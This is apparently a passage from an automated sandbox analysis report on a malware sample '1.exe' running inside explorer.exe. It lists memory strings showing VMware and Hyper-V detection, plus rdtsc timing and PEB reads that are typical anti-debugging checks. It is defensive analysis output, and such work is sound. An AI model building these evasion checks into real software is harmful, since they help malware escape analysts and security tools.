Source: explorer.exe, 00000003.00000002.4451321955.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000003.00000002.4453052192.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.2005157411.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.2002563045.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000003.00000002.4448974063.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 0000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.4453052192.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000000.2002563045.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000003.00000002.4451321955.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000003.00000000.2002563045.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000003.00000000.2002563045.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: explorer.exe, 00000003.00000002.4448974063.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000003.00000000.2005157411.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.2003510228.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_004088A0 rdtsc 2_2_004088A0
Source: C:\Users\user\Desktop\1.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017F4164 mov eax, dword ptr fs:[00000030h] 2_2_017F4164
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017B8158 mov eax, dword ptr fs:[00000030h] 2_2_017B8158
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01726154 mov eax, dword ptr fs:[00000030h] 2_2_01726154
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0171C156 mov eax, dword ptr fs:[00000030h] 2_2_0171C156
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h] 2_2_017B4144
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017B4144 mov ecx, dword ptr fs:[00000030h] 2_2_017B4144
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h] 2_2_017B4144
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01750124 mov eax, dword ptr fs:[00000030h] 2_2_01750124
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CA118 mov ecx, dword ptr fs:[00000030h] 2_2_017CA118
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CA118 mov eax, dword ptr fs:[00000030h] 2_2_017CA118
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E0115 mov eax, dword ptr fs:[00000030h] 2_2_017E0115
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017501F8 mov eax, dword ptr fs:[00000030h] 2_2_017501F8
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017F61E5 mov eax, dword ptr fs:[00000030h] 2_2_017F61E5
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0179E1D0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0179E1D0 mov ecx, dword ptr fs:[00000030h] 2_2_0179E1D0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0179E1D0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E61C3 mov eax, dword ptr fs:[00000030h] 2_2_017E61C3
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017A019F mov eax, dword ptr fs:[00000030h] 2_2_017A019F
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017A019F mov eax, dword ptr fs:[00000030h]